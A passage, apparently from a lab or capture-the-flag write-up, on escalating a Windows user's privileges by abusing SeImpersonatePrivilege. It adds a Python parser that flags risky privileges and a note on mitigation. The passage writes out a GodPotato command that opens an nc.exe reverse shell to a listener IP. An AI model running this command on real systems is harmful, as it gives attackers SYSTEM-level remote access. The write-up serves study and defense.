Privilege Escalation

I check the privileges of the user chris:

PowerShell
PS C:\users\chris\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\users\chris\desktop>

I try to abuse SeImpersonatePrivilege. I upload the necessary files and open a reverse shell on port 4444 through GodPotato:

PowerShell
PS C:\users\chris\desktop\wintools> .\GodPotato-NET4.exe -cmd "cmd /c C:\users\chris\desktop\wintools\nc.exe 192.168.45.248 4444 -e cmd"
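Reading `whoami /priv` by eye works for one host; for a triage script, or for checking the service accounts on a fleet, it helps to parse it. The Python below is an added example, not part of the writeup: it turns the output into rows and flags the privileges that commonly lead to SYSTEM, going beyond SeImpersonatePrivilege to the rest of the usual list. The high-risk mapping is my own; the sample input is the table from this section.

```python
import re

# Privileges that commonly let the holder become SYSTEM (mapping written for
# this example; extend it to taste).
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate tokens of connecting clients (Potato-family LPE)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
}

# One table row: name, free-text description, then the state at end of line.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_privileges(text):
    """Parse `whoami /priv` output into a list of (name, description, state)."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(2).strip(), m.group(3)))
    return rows


def flag_dangerous(rows):
    """Return [(name, state, why)] for privileges that warrant review.

    A 'Disabled' privilege is still present in the token and can be re-enabled
    by the process itself, so the state alone does not make it safe.
    """
    return [(name, state, HIGH_RISK[name]) for name, _, state in rows if name in HIGH_RISK]


# Sample input: the whoami /priv table shown in this section.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

if __name__ == "__main__":
    for name, state, why in flag_dangerous(parse_privileges(SAMPLE)):
        print(f"{name} [{state}]: {why}")
```

"Impersonate a client after authentication" is assigned by default to Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE, which is why a shell obtained through a service process so often carries it, as it does here through FreeSWITCH. The mitigation is on the service side: run it under an account that does not need the right (or remove the right in the local security policy), since the Potato family relies on the privilege itself rather than on a bug that a single patch removes.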

Finally I retrieve the proof.txt flag:

018.png